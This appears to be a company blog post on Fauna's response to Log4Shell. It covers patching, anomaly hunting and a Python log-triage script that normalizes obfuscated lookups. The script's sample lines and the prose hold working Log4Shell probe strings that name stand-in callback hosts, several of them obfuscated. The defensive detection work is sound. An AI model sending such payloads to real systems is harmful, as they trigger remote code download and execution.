Fauna’s response to the Log4Shell zero-day vulnerability
Tyson Trautmann|Dec 14th, 2021|
Fauna is a data API that allows developers to quickly and conveniently store application data without the hassle of managing and scaling a database. Many of the services that underpin Fauna's API run on the Java Virtual Machine (JVM), the runtime that executes programs compiled to Java bytecode. Those services use a popular open source logging library, Apache Log4j, which is an Apache Software Foundation (ASF) project.
On December 9th, a critical vulnerability in Log4j was publicly disclosed and a proof of concept exploit was published on GitHub. The vulnerability, nicknamed Log4Shell, abuses Log4j's lookup substitution: when a logged message contains a pattern such as `${jndi:ldap://attacker-host/x}`, Log4j resolves it through the Java Naming and Directory Interface (JNDI), which can fetch and execute a class from the remote endpoint in order to resolve the value. As a result, an attacker can host malicious code on a Lightweight Directory Access Protocol (LDAP), RMI, or other JNDI-reachable endpoint and then trigger download and execution of that code simply by placing a reference to the endpoint in any application input that is written to a log through Log4j, such as an HTTP User-Agent header, a username, or an API parameter. No authentication is required, and the attacker does not need to know which field ends up in the log; scanners spray the payload across every input they can reach.
On December 10th, the National Institute of Standards and Technology (NIST) published a Common Vulnerabilities and Exposures (CVE) entry for the issue, CVE-2021-44228. Upon becoming aware of the vulnerability, Fauna engineers immediately declared an internal Live Site Event (LSE) and dropped all other work to investigate our internal systems and determine which services were impacted. Because Fauna services are deployed through automated release pipelines with release safety practices built in, impacted services were quickly upgraded to Log4j 2.15.0 and safely deployed to production by the end of the day. In parallel, engineers used the security tooling deployed in all Fauna production environments to look for anomalous behavior (for example, unusual outbound network connections from JVM processes, which is what a successful JNDI class load produces) and found no evidence that the vulnerability had been exploited before the patch was deployed.
A few days later, on December 14th, NIST published a second CVE entry, CVE-2021-45046, for a related issue in Log4j that the 2.15.0 fix did not fully close. Again, Fauna engineers upgraded impacted services, this time to Log4j 2.16.0, and deployed them to production the same day. Fauna is a fully managed service, so no action was required by our customers to ensure that their data was not at risk.
Fauna's operational logs make it very clear that a large number of attackers are scanning for services that are susceptible to Log4Shell, and many of those probes use obfuscated lookup strings intended to slip past naive pattern matching. While our systems are no longer vulnerable, we strongly encourage Fauna customers and other developers who depend on Log4j to rapidly follow one of the mitigation options provided by the ASF, with upgrading to the latest fixed release being the preferred option.
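To make the mechanism above concrete, here is an added example (not code from Fauna or from the Log4j project) of the kind of log triage a responder can run while a patch is rolling out: it takes the lookup syntax that Log4Shell scanners embed in logged fields, collapses the common obfuscation tricks (`${lower:...}`, `${upper:...}`, and the `${...:-default}` fallback form) the way Log4j's own substitution does, innermost first, and then reports any resolved `${jndi:...}` lookup with its scheme and target. The log lines, hostnames, and IP addresses in the sample are constructed for this example and are not real Fauna traffic.

```python
import re
from dataclasses import dataclass

# Innermost ${...} lookup, i.e. one with no nested "${" inside it.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A fully resolved JNDI lookup: ${jndi:<scheme>:[//]<target>}
# The jndi prefix is matched case-insensitively, as Log4j does.
_JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:(?://)?([^}]*)\}", re.IGNORECASE
)

# Constructed sample log lines (not real traffic): benign requests mixed with
# typical Log4Shell probes, including obfuscated ones.
SAMPLE_LOG_LINES = [
    'GET / HTTP/1.1 ua="Mozilla/5.0 (X11; Linux x86_64)"',
    'GET / HTTP/1.1 ua="${jndi:ldap://203.0.113.10:1389/a}"',
    'GET /login HTTP/1.1 x-api-version="${${lower:j}ndi:${lower:l}dap://203.0.113.10/x}"',
    'GET / HTTP/1.1 ua="${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}:${::-/}/203.0.113.10:1099/o}"',
    'GET / HTTP/1.1 ua="${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//203.0.113.10/a}"',
    'GET /docs HTTP/1.1 ua="curl/7.79.1" note="price is ${10}"',
    'GET /graphql HTTP/1.1 ua="${${upper:j}${lower:NDI}:dns://203.0.113.10/r}"',
]


@dataclass
class Finding:
    line_no: int     # 1-based index into the scanned lines
    scheme: str      # ldap, rmi, dns, ... (lower-cased)
    target: str      # host[:port]/path the lookup would contact
    normalized: str  # the line after obfuscation has been collapsed


def _resolve_inner(match: "re.Match[str]") -> str:
    """Resolve one innermost lookup the way an attacker expects Log4j to."""
    body = match.group(1)
    # ${lower:X} / ${upper:X}: case-folding lookups used to hide "jndi".
    if body.lower().startswith("lower:"):
        return body[6:].lower()
    if body.lower().startswith("upper:"):
        return body[6:].upper()
    # ${name:-default}: a lookup that fails (e.g. ${env:NaN:-j}, ${::-j})
    # evaluates to the default text after ":-".
    idx = body.find(":-")
    if idx != -1:
        return body[idx + 2:]
    # Anything else (jndi:, date:, ${10}, ...) is left in place for the detector.
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Collapse nested lookup syntax innermost-first until nothing changes."""
    for _ in range(max_rounds):
        new_text = _INNER_LOOKUP.sub(_resolve_inner, text)
        if new_text == text:
            return text
        text = new_text
    return text  # pathological nesting depth: return what we have


def scan_log_lines(lines) -> list:
    """Return a Finding for every JNDI lookup present after normalization."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        for m in _JNDI_LOOKUP.finditer(normalized):
            findings.append(
                Finding(line_no, m.group(1).lower(), m.group(2), normalized)
            )
    return findings


if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: jndi {f.scheme} -> {f.target}")
        print(f"    normalized: {f.normalized}")
```

This is a triage aid, not a mitigation: it tells you which requests carried a probe and which callback hosts were named, which is useful when deciding what outbound connections to hunt for, but attackers keep inventing new encodings and the only reliable fix remains upgrading Log4j. Note also that the normalizer is deliberately narrow; it handles the lookup forms seen in mass scanning, and a line that does not match here still deserves a look if it contains `${` in a field that should never hold one.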
If you have questions about Fauna's response to Log4Shell, please contact our support team at email@example.com. Additionally, if you are a Fauna customer on one of our Individual, Team, or Business plans and you have questions about mitigating the impact of Log4Shell in the application code that consumes our data API, please open a ticket via our support portal and we will be happy to assist.
If you enjoyed our blog, and want to work on systems and challenges related to globally distributed systems, serverless databases, and GraphQL, Fauna is hiring!